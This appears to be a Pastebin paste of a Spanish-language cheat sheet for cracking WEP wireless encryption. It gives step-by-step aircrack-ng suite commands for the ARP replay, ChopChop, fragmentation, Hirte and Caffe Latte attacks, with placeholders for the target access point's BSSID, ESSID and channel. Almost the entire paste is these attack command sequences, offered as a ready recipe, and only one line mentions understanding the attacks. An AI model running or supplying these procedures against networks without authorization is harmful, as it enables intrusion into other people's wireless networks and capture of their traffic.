everblut

WEP ATTACK

Dec 30th, 2011
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.69 KB | None | 0 0
  1. ***Breaking WEP Cheat Sheet***
  2.  
  3. #Sacada de una ezine que ahorita no tengo la mano, pero estos son los ataques al
  4. #protocolo WEP, en resumen. Lo mas importante es saber como funcionan estos ataques y
  5. #en que escenarios nos podrían servir ;).
  6. #Ch33rS
  7. #by BgX
  8.  
  9. RESUMEN 1 + 3 ATTACK
  10. 1. airmon-ng start <interfaz de red>
  11. 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
  12. archivo donde se guardaran la captura> <interfaz>
  13. 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
  14. <BSSID del AP> -h <nuestra mac> <interfaz>
  15. 4. aireplay-ng -3 -x <velocidad de inyección> -b <BSSID del AP> -h
  16. <nuestra mac> <interfaz>
  17. 5. aircrack-ng <archivo captura .cap>
  18.  
  19. RESUMEN CHOP CHOP ATTACK
  20. 1. airmon-ng start <interfaz de red>
  21. 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
  22. archivo donde se guardaran la captura> <interfaz>
  23. 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
  24. <BSSID del AP> -h <nuestra mac> <interfaz>
  25. 4. aireplay-ng -4 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
  26. 5. tcpdump -s 0 -n -e -r <archivo .cap generado antes>
  27. 6. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del
  28. rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w
  29. <archivo a reinyectar>
  30. 7. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior>
  31. <interfaz>
  32. 8. aircrack-ng <archivo de captura .cap>
  33.  
  34. RESUMEN FRAGMENTACIÓN ATTACK
  35. 1. airmon-ng start <interfaz de red>
  36. 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
  37. archivo donde se guardaran la captura> <interfaz>
  38. 3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a
  39. <BSSID del AP> -h <nuestra mac> <interfaz>
  40. 4. aireplay-ng -5 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
  41. 5. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del
  42. rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w
  43. <archivo a reinyectar>
  44. 6. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior>
  45. <interfaz>
  46. 7. aircrack-ng <archivo de captura .cap>
  47.  
  48. RESUMEN HIRTE ATTACK
  49. 1. airmon-ng start <interfaz de red>
  50. 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
  51. archivo donde se guardaran la captura> <interfaz>
  52. 3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo>
  53. -N -W 1 <interfaz>
  54. 4. aircrack-ng <archivo de captura .cap>
  55.  
  56. RESUMEN CAFFE LATTE ATTACK
  57. 1. airmon-ng start <interfaz de red>
  58. 2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del
  59. archivo donde se guardaran la captura> <interfaz>
  60. 3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo>
  61. -L -W 1 <interfaz>
  62. 4. aircrack-ng <archivo de captura .cap>
Add Comment
Please, Sign In to add comment